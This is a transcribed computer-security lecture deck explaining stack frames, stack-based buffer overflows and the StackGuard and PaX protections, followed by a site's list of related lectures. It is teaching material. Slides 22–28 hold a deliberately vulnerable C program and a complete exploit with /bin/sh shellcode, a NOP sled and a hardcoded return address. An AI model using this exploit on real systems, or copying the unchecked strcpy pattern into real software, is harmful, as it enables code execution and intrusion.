Buffer Overflow and Protection Technology. Department of Computer Science,

Size: px
Start display at page:

Download "Buffer Overflow and Protection Technology. Department of Computer Science,"

Transcription

1 Buffer Overflow and Protection Technology Department of Computer Science, Lorenzo Cavallaro Andrea Lanzi

2 Table of Contents Introduction Stack-based Buffer Overflow Buffer overflow introduction Stack and Stack Frame Calling Convention Issue, Injection and Payload execution Protection Technology Compiler-enforced protection: Stack Guard, ProPolice SSP Kernel-enforced protection: PaX

3 Introduction (1) Privacy-enhancing technologies: Anonymizer, Mixes of Chaum, Onion Routing, Crowds, Anonymous Credentials, Blind Signatures and so on... These kind of technologies try to improve the privacy of active users But there are also sensible data, that the users don't want to disclose and want them to remain private passwords, IM passwords, DB passwords in PHP/ASP applications, personal s, credit card number... Usually cryptography may help to improve this kind of users' privacy but it's not always deployable

4 Buffer overflow introduction Buffer overflow are one of the most biggest vulnerability, nowadays Writing past the end of a buffer, if properly done, may allow an attacker to execute arbitrary code running with full priviledges Robert T. Morris Jr. worm, The Internet Worm (1988), was the first public example that showed such an exploitation technique Aleph1 Smashing the Stack for fun and profit (1996) represents the first underground's paper about stack-based buffer overflow

5 The Stack (1) It's a memory data structure used by a process as storage for function's local variables and function's parameters A function Stack Frame (or Activation Record, AR) is associated at each function call. The AR usually holds function's parameters (if any) return address (RET); memory address at which start again the execution once the function is ended caller's AR memory address (it may not be there at all) function's local variables (if any)

6 The Stack (2) Abstract Data Type, Last-in First-out (LIFO) Let S be a Stack and e an element. The common stack operation are push(s,e) it inserts the element e at the top of the stack e = pop(s) it retrieves the element at the top of the stack S and update the stack pointer S = top(s) it retrieves the top of the stack S

7 The Stack (3) i386 computer architecture, Linux operating system Stack grows from high memory addresses (bottom of the stack) toward lower one (top of the stack) Write operations are performed from low memory addresses toward higher one little-endian multibyte storage in memory ESP (Extended Stack Poiner) 32 bit CPU register points always at the top of the stack EBP (Extended Base Pointer) 32 bit CPU register, also known as Frame Pointer (FP), points at the current AR (stack frame)

8 Stack Layout: function with no arguments void function(void) { int x; char buf[10]; x = 5; } memset(buf, 0, sizeof (buf)); strcpy(buf, securephd );

9 Calling Convention Convention used to build the right environment when calling a function C declaration syntax (cdecl) parameters are passed on the stack in reverse declaration order it's up to the caller to clean up the allocated stack space Standard syntax (stdcall) parameters are passed on the stack in reverse declaration order it's up to the callee to clean up the allocated stack space fast call syntax, naked...

10 Function call (1) Using the cdecl calling convention, at each function call, the generated assembly code must push on the stack the function's parameters in reverse declaration order call the function (e.g. call function_address) which semantically means push(s, return_address) jump function_address

11 Function call (2) At the very begin of every function there are few instructions, the prologue, that are executed when the function gains control push(s, EBP) EBP = ESP doing so, the function can use EBP, the frame pointer, to address local variables (using negative offsets) and to address its parameters (using positive offsets)

12 Automatic variables After prologue's execution, the function allocates space on the stack for its local variables (if any) doing explicit stack pointer operation (e.g. sub $0x10, %esp) doing implicit stack pointer operation (e.g. pushl $0x ) Automatic variables are allocates on the stack, hence usual scope rules are applied; local variables are visible only within their Activation Record they are not available once the function is terminated

13 Function termination At the very end of every function, there are few instructions, the epilogue, which are executed when the function is going to terminate. The epilogue fixes what the prologue did ESP = EBP (e.g. mov %ebp, %esp) EBP = pop(s) (e.g. popl %ebp) The function ends its execution, returning to the caller, by issuing a ret instruction which semantically corresponds to EIP = pop(s). This, in fact, retrieve the previously Saved Return Address, pushed on the stack by means of the function call

14 Stack Layout: function with arguments int main(void) { int res; } res = sum(5, 6); printf( sum is: %d\n, res); exit(0); 0x080483b3 0x080483b8 int sum(int a, int b) { return (a + b); } 0x80483da

15 Buffer Overflow (1) C strings are sequences of bytes (char arrays) nil terminated \0STRING 2\0 string 1 string 2 VERY BIG STRING\0 string 3 Copying string 3 into string 1 without checking for target boundaries, we'll get VERY BIG STRING\0G 2\0

16 Buffer Overflow (2) A buffer overflow occours when too many data are written into a buffer besides its real size, causing it to overflow Remember that stack grows toward lower memory addresses while memory write are done toward higher memory addresses Stack holds sensible information, besides local data, such as the Saved Return Address (SRET) What happen if we can cause a buffer to overflow, in order to overwrite important informations, such as SRET, stored on the stack?

17 Buffer Overflow (3) At function termination, after the epilogue, the ret (0xc3) assembly instruction is executed If, exploiting a buffer overflow vulnerability, the SRET gets overwritten, the attacker gain control of the EIP register which manages the process execution flow Once EIP is subverted, it remains to choose where to hijack this flow to Usually the hijacked execution flow is redirected to a code written and injected by the attacker. This code is called payload (shellcode, egg,...)

18 Injection (1) Talking about buffer overflow usually implies talking about injection vector and payload The injection vector is the ad hoc built vector which will be sent to the vulnerable process. It may holds payload's address payload... The payload is the code the attacker wants to execute Both the injection vector and the payload are architecture and OS dependent

19 Payload execution Direct jump payload's address guessing addresses may contains nil bytes payload's address may change (security patches such as PaX ASLR) issue about target vulnerable buffer size Payload stored in the vulnerable process environment Pop return Call register Push return

20 No Operation Assembly instruction that execute no operation (0x90) Combined with Direct jump, increases the error percentage the attacker may do, while guessing the payload's memory address With NOP, the jump may allow to fall down on a landing area Usually the injection vector looks like NOP..NOP PAYLOAD RETADDR..RETADDR

21 Advanced techniques (overview) Off-by-one (SFP LSB overwrite) stack function pointer overwriting heap overflow (free/malloc chunk overwriting) advanced payload IDS evasion alfanumericl polymorphic crypted

22 Example: vuln.c (1) int main(void) { char buf[512]; int done = 0; while (!done) { memset(buf, 0, sizeof (buf)); read(0, buf, sizeof (buf) 1); buf[strlen(buf 1)] = 0; } done = vuln(buf); } exit(0);

23 Example: vuln.c (2) int vuln(char *s) { char small[128]; memset(small, 0, sizeof (small)); if (!strncmp(s, exit, 4)) return 1; strcpy(small, s); printf( [+] buf@%p\n, small); printf( [+] small: %s\n, small); } return 0;

24 Example: vuln execution (1) $./vuln Buffer Overflow [+] [+] small: Buffer Overflow exit $ perl -e '{ print A x 160 }'./vuln [+] buf@0xbffff8a0 [+] small: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA zsh: 3477 done perl -e '{ print "A" x 160 }' zsh: 3478 segmentation fault (core dumped)./vuln

25 Example: vuln execution (2) $ gdb -q -c core Core was generated by `./vuln'. Program terminated with signal 11, Segmentation fault. #0 0x in?? () (gdb) info reg eip eip 0x x (gdb) quit $ (./x ; cat)./vuln [+] buf@9xbffff8a0 [+] small: (garbage)... id uid=1000(sullivan) gid=100(users)...

26 Exploit (1) #include <stdio.h> #define RETADDR 0xbffff8a0 #define NOP 0x90 unsigned char shellcode[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x89\x43\x0c \x88\x43\x07\x89\xc2\x8d\x4b\x08\xb0\x0b\xcd \x80\xe8\xe6\xff\xff\xff/bin/sh"; int main(void) { char buf[160]; int i; char *p; /* zero out buffer */ memset(buf, 0, sizeof (buf));

27 Exploit (2) /* * Fill with the return address, the address at which we want to jump to, * the address at which the vulnearabile buffer is stored and that we have * filled with NOP..NOP, shellcode, RETADDR..RETADDR... hence with our * payload too */ for (i = 0; i < sizeof (buf); i += 4) *(unsigned int *)(buf + i) = RETADDR; /* * Fill the buffer with 20 byte of NOP even if we don't need it * since you already know at which address will be our payload (in the * injected vector): it's the vuln program that prints this for us */ memset(buf, NOP, 20);...

28 Exploit (3) /* * after follow our paylod that we want to execute, our shellcode. */ p = (buf + 20); for (i = 0; i < strlen(shellcode); i++) p[i] = shellcode[i]; buf[sizeof(buf) - 1] = 0; printf("%s\n", buf); }

29 Protection Technology Buffer overflows issue may be solved in different ways in order to prevent execution flow hijacking and arbitrary code execution There are two main categories to this purpose: Compiler-enforced protection (e.g. Stack Guard) Compilers have complete knowledge about the structure of the binary so they can modify the program's stack layout in order to prevent, or at least detect and stop, buffer overflows Kernel-enforced protection (e.g. Grsecurity, PaX) The kernel cannot modify the program's stack layout since it doesn't know anything about it, but it has a complete knowledge of a process' virtual address space layout so it can apply access controls to pages of memory in order to prevent execution of arbitrary code

30 Stack Guard (1) Stack Guard is a compiler-enforced protection technology Implemented in the GNU C compiler, stops stack-based buffer overflow vulnerabilities introducing just a little performance cost Integrity check on the Activation Records it detects control information (SRET) overwriting Issue with this solution: the attacker may choose to execute payload already in memory (or injected in other places) As safeguard measure, a canary location is inserted before the sensible control information on the stack

31 Stack Guard (2) Canary value should be both hard to detect and to spoof by an attacker The canary location is initialized just after having saved the control informations on the stack, i.e. after the prologue is executed The canary location is checked up just before restoring the control information, i.e. before the epilogue is executed This way the control information are protected since its values is checked up just before they gets restored

32 Stack Guard (3) There are four types of stack canaries: NULL canary, introduced by der Mouse, consists of a 0x value. Terminator canary, detect strings overflow but it has a known value: CR, LF, NULL, -1. Since many functions that manages strings use those terminators as string terminator, it shouldn't be possible to write past the end of the vulnerable buffers All functions that write to memory without directly managing strings, such as memcpy(3), may bypass these canaries

33 Stack Guard (4) Random canary can detects all memory writes that are not able to guess this canary value defeating, hence, the buffer overflow issue Usually the canary is a global variable initialized at program startup. The attacker should be able to guess this value in order to be successful in the exploitation of the vulnerability Random XOR canary acts like random canary but it adds an integrity check to the protected control information, by perform an XOR operation between the canary and those information, storing the result in the canary location

34 PaX PaX is a kernel-enforced protection technology It offers prevention against abritrary code execution via memory management access controls, NOEXEC address space layout randomization, ASLR It's embedded by Grsecurity Linux kernel patch which also offers read-only sys_call_table, IDT and GDT /dev/kmem, /dev/mem and /dev/port protections /proc, and chroot(2) restrictions Trusted Path Execution, psuedo-random PID, IP ID, TCP ISN and TCP source ports, socket creation restrictions

35 PaX NOEXEC It aims to prevent the injection and execution of arbitrary code into a process' address space It makes all the memory that holds stack, heap, data and anonymous mappings area non-executable There are two approaches on IA-32 architecture PAGEEXEC which uses the paging logic of the CPU SEGMEXEC which uses the segmentation logic of the CPU Since page protection rights originate from mmap(2) syscall and they can be changed by mprotect(2), it exists also MPROTECT feature, in order to enforce this protection

36 PaX ASLR (1) Address Space Layout Randomization attempts to render exploits that depends on fixed addresses useless It introduces a small amount of randomness to the layout of the process' virtual memory space There are several memory areas that need this randomness RANDUSTACK it randomizes the user land stack addresses; it's the kernel that create the process' stack layout RANDKSTACK it randomizes the kernel land stack addresses associated to each task structure

37 PaX ASLR (2) RANDMMAP it handles the randomization of all file and anonymous memory mappings (mmap(2), brk(2)) RANDEXEC it randomizes the location of ET_EXEC ELF binaries. it loads the executable at the standard address which lies into non-executable pages an executable copy of the binary is created at a random location using the RANDMMAP features execution attempts flow back into the randomized mapping via a page fault handler if the non-executable page is accessed instead of the randomly relocated image

Buffer Overflows Defending against arbitrary code insertion and execution

Buffer Overflows Defending against arbitrary code insertion and execution www.harmonysecurity.com info@harmonysecurity.com Buffer Overflows Defending against arbitrary code insertion and execution By Stephen Fewer Contents 1 Introduction 2 1.1 Where does the problem lie? 2 1.1.1

More information

Lecture 08 Control-flow Hijacking Defenses

Lecture 08 Control-flow Hijacking Defenses Lecture 08 Control-flow Hijacking Defenses Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Slides adapted from Miller, Bailey, and Brumley Control Flow Hijack: Always control + computation

More information

Basic Buffer Overflows

Basic Buffer Overflows Operating Systems Security Basic Buffer Overflows (Stack Smashing) Computer Security & OS lab. Cho, Seong-je ( 조성제 ) Fall, 2018 sjcho at dankook.ac.kr Chapter 10 Buffer Overflow 2 Contents Virtual Memory

More information

CSC 405 Computer Security Stack Canaries & ASLR

CSC 405 Computer Security Stack Canaries & ASLR CSC 405 Computer Security Stack Canaries & ASLR Alexandros Kapravelos akaprav@ncsu.edu How can we prevent a buffer overflow? Check bounds Programmer Language Stack canaries [...more ] Buffer overflow defenses

More information

Beyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)

Beyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS) Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus(MSR) and Brandon Baker (MS) Buffer Overflows and How they Occur Buffer is a contiguous segment of memory of a fixed

More information

Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it

Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it 29.11.2012 Secure Software Engineering Andreas Follner 1 Andreas Follner Graduated earlier

More information

CSC 591 Systems Attacks and Defenses Stack Canaries & ASLR

CSC 591 Systems Attacks and Defenses Stack Canaries & ASLR CSC 591 Systems Attacks and Defenses Stack Canaries & ASLR Alexandros Kapravelos akaprav@ncsu.edu How can we prevent a buffer overflow? Check bounds Programmer Language Stack canaries [...more ] Buffer

More information

Stack -- Memory which holds register contents. Will keep the EIP of the next address after the call

Stack -- Memory which holds register contents. Will keep the EIP of the next address after the call Call without Parameter Value Transfer What are involved? ESP Stack Pointer Register Grows by 4 for EIP (return address) storage Stack -- Memory which holds register contents Will keep the EIP of the next

More information

20: Exploits and Containment

20: Exploits and Containment 20: Exploits and Containment Mark Handley Andrea Bittau What is an exploit? Programs contain bugs. These bugs could have security implications (vulnerabilities) An exploit is a tool which exploits a vulnerability

More information

2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks

2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks Runtime attacks are major threats to today's applications Control-flow of an application is compromised at runtime Typically, runtime attacks include injection of malicious code Reasons for runtime attacks

More information

Software Security: Buffer Overflow Defenses

Software Security: Buffer Overflow Defenses CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Defenses Fall 2017 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin,

More information

CSC 591 Systems Attacks and Defenses Return-into-libc & ROP

CSC 591 Systems Attacks and Defenses Return-into-libc & ROP CSC 591 Systems Attacks and Defenses Return-into-libc & ROP Alexandros Kapravelos akaprav@ncsu.edu NOEXEC (W^X) 0xFFFFFF Stack Heap BSS Data 0x000000 Code RW RX Deployment Linux (via PaX patches) OpenBSD

More information

CSC 2400: Computing Systems. X86 Assembly: Function Calls"

CSC 2400: Computing Systems. X86 Assembly: Function Calls CSC 24: Computing Systems X86 Assembly: Function Calls" 1 Lecture Goals! Challenges of supporting functions" Providing information for the called function" Function arguments and local variables" Allowing

More information

This time. Defenses and other memory safety vulnerabilities. Everything you ve always wanted to know about gdb but were too afraid to ask

This time. Defenses and other memory safety vulnerabilities. Everything you ve always wanted to know about gdb but were too afraid to ask This time We will continue Buffer overflows By looking at Overflow Defenses and other memory safety vulnerabilities Everything you ve always wanted to know about gdb but were too afraid to ask Overflow

More information

x86 assembly CS449 Fall 2017

x86 assembly CS449 Fall 2017 x86 assembly CS449 Fall 2017 x86 is a CISC CISC (Complex Instruction Set Computer) e.g. x86 Hundreds of (complex) instructions Only a handful of registers RISC (Reduced Instruction Set Computer) e.g. MIPS

More information

Smashing the Buffer. Miroslav Štampar

Smashing the Buffer. Miroslav Štampar Smashing the Buffer Miroslav Štampar (mstampar@zsis.hr) Summary BSidesVienna 2014, Vienna (Austria) November 22nd, 2014 2 Buffer overflow (a.k.a.) Buffer overrun An anomaly where a program, while writing

More information

CS 161 Computer Security

CS 161 Computer Security Paxson Spring 2017 CS 161 Computer Security Discussion 2 Question 1 Software Vulnerabilities (15 min) For the following code, assume an attacker can control the value of basket passed into eval basket.

More information

Università Ca Foscari Venezia

Università Ca Foscari Venezia Stack Overflow Security 1 2018-19 Università Ca Foscari Venezia www.dais.unive.it/~focardi secgroup.dais.unive.it Introduction Buffer overflow is due to careless programming in unsafe languages like C

More information

CMPSC 497 Buffer Overflow Vulnerabilities

CMPSC 497 Buffer Overflow Vulnerabilities Systems and Internet Infrastructure Security Network and Security Research Center Department of Computer Science and Engineering Pennsylvania State University, University Park PA CMPSC 497 Buffer Overflow

More information

CNIT 127: Exploit Development. Ch 2: Stack Overflows in Linux

CNIT 127: Exploit Development. Ch 2: Stack Overflows in Linux CNIT 127: Exploit Development Ch 2: Stack Overflows in Linux Stack-based Buffer Overflows Most popular and best understood exploitation method Aleph One's "Smashing the Stack for Fun and Profit" (1996)

More information

CNIT 127: Exploit Development. Ch 1: Before you begin. Updated

CNIT 127: Exploit Development. Ch 1: Before you begin. Updated CNIT 127: Exploit Development Ch 1: Before you begin Updated 1-14-16 Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend, such as Denial

More information

CS 645: Lecture 3 Software Vulnerabilities. Rachel Greenstadt July 3, 2013

CS 645: Lecture 3 Software Vulnerabilities. Rachel Greenstadt July 3, 2013 CS 645: Lecture 3 Software Vulnerabilities Rachel Greenstadt July 3, 2013 Project 1: Software exploits Individual project - done in virtual machine environment This assignment is hard. Don t leave it until

More information

Betriebssysteme und Sicherheit Sicherheit. Buffer Overflows

Betriebssysteme und Sicherheit Sicherheit. Buffer Overflows Betriebssysteme und Sicherheit Sicherheit Buffer Overflows Software Vulnerabilities Implementation error Input validation Attacker-supplied input can lead to Corruption Code execution... Even remote exploitation

More information

Lecture 4 September Required reading materials for this class

Lecture 4 September Required reading materials for this class EECS 261: Computer Security Fall 2007 Lecture 4 September 6 Lecturer: David Wagner Scribe: DK Moon 4.1 Required reading materials for this class Beyond Stack Smashing: Recent Advances in Exploiting Buffer

More information

Linux Memory Layout. Lecture 6B Machine-Level Programming V: Miscellaneous Topics. Linux Memory Allocation. Text & Stack Example. Topics.

Linux Memory Layout. Lecture 6B Machine-Level Programming V: Miscellaneous Topics. Linux Memory Allocation. Text & Stack Example. Topics. Lecture 6B Machine-Level Programming V: Miscellaneous Topics Topics Linux Memory Layout Understanding Pointers Buffer Overflow Upper 2 hex digits of address Red Hat v. 6.2 ~1920MB memory limit FF C0 Used

More information

Introduction to Computer Systems , fall th Lecture, Sep. 28 th

Introduction to Computer Systems , fall th Lecture, Sep. 28 th Introduction to Computer Systems 15 213, fall 2009 9 th Lecture, Sep. 28 th Instructors: Majd Sakr and Khaled Harras Last Time: Structures struct rec { int i; int a[3]; int *p; }; Memory Layout i a p 0

More information

THEORY OF COMPILATION

THEORY OF COMPILATION Lecture 10 Activation Records THEORY OF COMPILATION EranYahav www.cs.technion.ac.il/~yahave/tocs2011/compilers-lec10.pptx Reference: Dragon 7.1,7.2. MCD 6.3,6.4.2 1 You are here Compiler txt Source Lexical

More information

CSC 2400: Computing Systems. X86 Assembly: Function Calls

CSC 2400: Computing Systems. X86 Assembly: Function Calls CSC 24: Computing Systems X86 Assembly: Function Calls 1 Lecture Goals Challenges of supporting functions Providing information for the called function Function arguments and local variables Allowing the

More information

Exercise 6: Buffer Overflow and return-into-libc Attacks

Exercise 6: Buffer Overflow and return-into-libc Attacks Technische Universität Darmstadt Fachbereich Informatik System Security Lab Prof. Dr.-Ing. Ahmad-Reza Sadeghi M.Sc. David Gens Exercise 6: Buffer Overflow and return-into-libc Attacks Course Secure, Trusted

More information

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES BUFFER OVERFLOW DEFENSES & COUNTERMEASURES CMSC 414 FEB 01 2018 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Finding the return address (guess

More information

Software Security: Buffer Overflow Attacks

Software Security: Buffer Overflow Attacks CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Attacks (continued) Autumn 2018 Tadayoshi (Yoshi) Kohno yoshi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann,

More information

CNIT 127: Exploit Development. Ch 14: Protection Mechanisms. Updated

CNIT 127: Exploit Development. Ch 14: Protection Mechanisms. Updated CNIT 127: Exploit Development Ch 14: Protection Mechanisms Updated 3-25-17 Topics Non-Executable Stack W^X (Either Writable or Executable Memory) Stack Data Protection Canaries Ideal Stack Layout AAAS:

More information

CSE 127 Computer Security

CSE 127 Computer Security CSE 127 Computer Security Stefan Savage, Fall 2018, Lecture 4 Low Level Software Security II: Format Strings, Shellcode, & Stack Protection Review Function arguments and local variables are stored on the

More information

Secure Programming Lecture 3: Memory Corruption I (Stack Overflows)

Secure Programming Lecture 3: Memory Corruption I (Stack Overflows) Secure Programming Lecture 3: Memory Corruption I (Stack Overflows) David Aspinall, Informatics @ Edinburgh 24th January 2017 Outline Roadmap Memory corruption vulnerabilities Instant Languages and Runtimes

More information

CSE 565 Computer Security Fall 2018

CSE 565 Computer Security Fall 2018 CSE 565 Computer Security Fall 2018 Lecture 14: Software Security Department of Computer Science and Engineering University at Buffalo 1 Software Security Exploiting software vulnerabilities is paramount

More information

CSE 127 Computer Security

CSE 127 Computer Security CSE 127 Computer Security Stefan Savage, Spring 2018, Lecture 4 Low Level Software Security II: Format Strings, Shellcode, & Stack Protection Review Function arguments and local variables are stored on

More information

Security and Privacy in Computer Systems. Lecture 5: Application Program Security

Security and Privacy in Computer Systems. Lecture 5: Application Program Security CS 645 Security and Privacy in Computer Systems Lecture 5: Application Program Security Buffer overflow exploits More effective buffer overflow attacks Preventing buffer overflow attacks Announcement Project

More information

Software Security: Buffer Overflow Attacks (continued)

Software Security: Buffer Overflow Attacks (continued) CSE 484 / CSE M 584: Computer Security and Privacy Software Security: Buffer Overflow Attacks (continued) Spring 2015 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann,

More information

Lecture 09 Code reuse attacks. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017

Lecture 09 Code reuse attacks. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Lecture 09 Code reuse attacks Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Last time No good reason for stack/heap/static data to be executable No good reason for code to be writable

More information

Buffer Overflow Attack (AskCypert CLaaS)

Buffer Overflow Attack (AskCypert CLaaS) Buffer Overflow Attack (AskCypert CLaaS) ---------------------- BufferOverflow.c code 1. int main(int arg c, char** argv) 2. { 3. char name[64]; 4. printf( Addr;%p\n, name); 5. strcpy(name, argv[1]); 6.

More information

Practical Malware Analysis

Practical Malware Analysis Practical Malware Analysis Ch 4: A Crash Course in x86 Disassembly Revised 1-16-7 Basic Techniques Basic static analysis Looks at malware from the outside Basic dynamic analysis Only shows you how the

More information

Software Vulnerabilities. Jeff Foster University of Maryland, College Park

Software Vulnerabilities. Jeff Foster University of Maryland, College Park Software Vulnerabilities Jeff Foster University of Maryland, College Park When is a Program Secure? When it does exactly what it should! But what is it supposed to do? - Someone tells us (do we trust them?)

More information

String Oriented Programming Exploring Format String Attacks. Mathias Payer

String Oriented Programming Exploring Format String Attacks. Mathias Payer String Oriented Programming Exploring Format String Attacks Mathias Payer Motivation Additional protection mechanisms prevent many existing attack vectors Format string exploits are often overlooked Drawback:

More information

Biography. Background

Biography. Background From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ KTH, January 2019 1 / 28 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail: calle.svensson@zeta-two.com

More information

Advanced Buffer Overflow

Advanced Buffer Overflow Pattern Recognition and Applications Lab Advanced Buffer Overflow Ing. Davide Maiorca, Ph.D. davide.maiorca@diee.unica.it Computer Security A.Y. 2016/2017 Department of Electrical and Electronic Engineering

More information

Lab 2: Buffer Overflows

Lab 2: Buffer Overflows Department of Computer Science: Cyber Security Practice Lab 2: Buffer Overflows Introduction In this lab, you will learn how buffer overflows and other memory vulnerabilities are used to takeover vulnerable

More information

We will focus on Buffer overflow attacks SQL injections. See book for other examples

We will focus on Buffer overflow attacks SQL injections. See book for other examples We will focus on Buffer overflow attacks SQL injections See book for other examples Buffer overrun is another common term Buffer Overflow A condition at an interface under which more input can be placed

More information

Software Vulnerabilities August 31, 2011 / CS261 Computer Security

Software Vulnerabilities August 31, 2011 / CS261 Computer Security Software Vulnerabilities August 31, 2011 / CS261 Computer Security Software Vulnerabilities...1 Review paper discussion...2 Trampolining...2 Heap smashing...2 malloc/free...2 Double freeing...4 Defenses...5

More information

CSE 509: Computer Security

CSE 509: Computer Security CSE 509: Computer Security Date: 2.16.2009 BUFFER OVERFLOWS: input data Server running a daemon Attacker Code The attacker sends data to the daemon process running at the server side and could thus trigger

More information

CS 161 Computer Security. Week of January 22, 2018: GDB and x86 assembly

CS 161 Computer Security. Week of January 22, 2018: GDB and x86 assembly Raluca Popa Spring 2018 CS 161 Computer Security Discussion 1 Week of January 22, 2018: GDB and x86 assembly Objective: Studying memory vulnerabilities requires being able to read assembly and step through

More information

Selected background on ARM registers, stack layout, and calling convention

Selected background on ARM registers, stack layout, and calling convention Selected background on ARM registers, stack layout, and calling convention ARM Overview ARM stands for Advanced RISC Machine Main application area: Mobile phones, smartphones (Apple iphone, Google Android),

More information

From Over ow to Shell

From Over ow to Shell From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ Google, December 2018 1 / 25 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail:

More information

Software Security II: Memory Errors - Attacks & Defenses

Software Security II: Memory Errors - Attacks & Defenses 1 Software Security II: Memory Errors - Attacks & Defenses Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab1 Writeup 3 Buffer overflow Out-of-bound memory writes (mostly sequential) Allow

More information

Stack overflow exploitation

Stack overflow exploitation Stack overflow exploitation In order to illustrate how the stack overflow exploitation goes I m going to use the following c code: #include #include #include static void

More information

18-600: Recitation #4 Exploits

18-600: Recitation #4 Exploits 18-600: Recitation #4 Exploits 20th September 2016 Agenda More x86-64 assembly Buffer Overflow Attack Return Oriented Programming Attack 3 Recap: x86-64: Register Conventions Arguments passed in registers:

More information

SYSTEM CALL IMPLEMENTATION. CS124 Operating Systems Fall , Lecture 14

SYSTEM CALL IMPLEMENTATION. CS124 Operating Systems Fall , Lecture 14 SYSTEM CALL IMPLEMENTATION CS124 Operating Systems Fall 2017-2018, Lecture 14 2 User Processes and System Calls Previously stated that user applications interact with the kernel via system calls Typically

More information

Security Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40

Security Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40 Security Workshop HTS LSE Team EPITA 2018 February 3rd, 2016 1 / 40 Introduction What is this talk about? Presentation of some basic memory corruption bugs Presentation of some simple protections Writing

More information

Topics in Software Security Vulnerability

Topics in Software Security Vulnerability Topics in Software Security Vulnerability Software vulnerability What are software vulnerabilities? Types of vulnerabilities E.g., Buffer Overflows How to find these vulnerabilities and prevent them? Classes

More information

Program Security and Vulnerabilities Class 2

Program Security and Vulnerabilities Class 2 Program Security and Vulnerabilities Class 2 CEN-5079: 28.August.2017 1 Secure Programs Programs Operating System Device Drivers Network Software (TCP stack, web servers ) Database Management Systems Integrity

More information

Project 1 Notes and Demo

Project 1 Notes and Demo Project 1 Notes and Demo Overview You ll be given the source code for 7 short buggy programs (target[1-7].c). These programs will be installed with setuid root Your job is to write exploits (sploit[1-7].c)

More information

Runtime Defenses against Memory Corruption

Runtime Defenses against Memory Corruption CS 380S Runtime Defenses against Memory Corruption Vitaly Shmatikov slide 1 Reading Assignment Cowan et al. Buffer overflows: Attacks and defenses for the vulnerability of the decade (DISCEX 2000). Avijit,

More information

Systems I. Machine-Level Programming V: Procedures

Systems I. Machine-Level Programming V: Procedures Systems I Machine-Level Programming V: Procedures Topics abstraction and implementation IA32 stack discipline Procedural Memory Usage void swap(int *xp, int *yp) int t0 = *xp; int t1 = *yp; *xp = t1; *yp

More information

Writing Exploits. Nethemba s.r.o.

Writing Exploits. Nethemba s.r.o. Writing Exploits Nethemba s.r.o. norbert.szetei@nethemba.com Motivation Basic code injection W^X (DEP), ASLR, Canary (Armoring) Return Oriented Programming (ROP) Tools of the Trade Metasploit A Brief History

More information

CSE 127 Computer Security

CSE 127 Computer Security CSE 127 Computer Security Alex Gantman, Spring 2018, Lecture 4 Low Level Software Security II: Format Strings, Shellcode, & Stack Protection Review Function arguments and local variables are stored on

More information

(Early) Memory Corruption Attacks

(Early) Memory Corruption Attacks (Early) Memory Corruption Attacks CS-576 Systems Security Instructor: Georgios Portokalidis Fall 2018 Fall 2018 Stevens Institute of Technology 1 Memory Corruption Memory corruption occurs in a computer

More information

Exploits and gdb. Tutorial 5

Exploits and gdb. Tutorial 5 Exploits and gdb Tutorial 5 Exploits and gdb 1. Buffer Vulnerabilities 2. Code Injection 3. Integer Attacks 4. Advanced Exploitation 5. GNU Debugger (gdb) Buffer Vulnerabilities Basic Idea Overflow or

More information

Architecture-level Security Vulnerabilities

Architecture-level Security Vulnerabilities Architecture-level Security Vulnerabilities Björn Döbel Outline How stacks work Smashing the stack for fun and profit Preventing stack smashing attacks Circumventing stack smashing prevention The Battlefield:

More information

ECS 153 Discussion Section. April 6, 2015

ECS 153 Discussion Section. April 6, 2015 ECS 153 Discussion Section April 6, 2015 1 What We ll Cover Goal: To discuss buffer overflows in detail Stack- based buffer overflows Smashing the stack : execution from the stack ARC (or return- to- libc)

More information

buffer overflow exploitation

buffer overflow exploitation buffer overflow exploitation Samuele Andreoli, Nicolò Fornari, Giuseppe Vitto May 11, 2016 University of Trento Introduction 1 introduction A Buffer Overflow is an anomaly where a program, while writing

More information

Roadmap: Security in the software lifecycle. Memory corruption vulnerabilities

Roadmap: Security in the software lifecycle. Memory corruption vulnerabilities Secure Programming Lecture 3: Memory Corruption I (introduction) David Aspinall, Informatics @ Edinburgh 24th January 2019 Roadmap: Security in the software lifecycle Security is considered at different

More information

HW 8 CS681 & CS392 Computer Security Understanding and Experimenting with Memory Corruption Vulnerabilities DUE 12/18/2005

